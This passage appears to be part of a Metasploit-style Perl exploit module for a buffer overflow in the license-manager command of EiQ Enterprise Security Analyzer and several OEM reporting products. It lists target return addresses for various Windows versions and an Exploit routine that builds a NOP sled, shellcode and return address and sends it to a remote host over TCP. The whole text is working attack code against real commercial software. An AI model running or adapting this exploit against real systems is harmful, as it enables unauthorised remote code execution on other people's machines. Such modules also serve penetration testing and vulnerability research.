'Refs' =>
[
['OSVDB', '27526'],
],

'DefaultTarget' => 1,
'Targets' =>
[
['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ], # call ebx
['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ], # jmp ebx
['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ], # jmp EBX
['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my $nopsize = $target->[2];
my $nops = $self->MakeNops($nopsize - length($shellcode));
my $ret = pack("V", $target->[1]);
my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";


my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));

$s->Send("$evil");
return;
}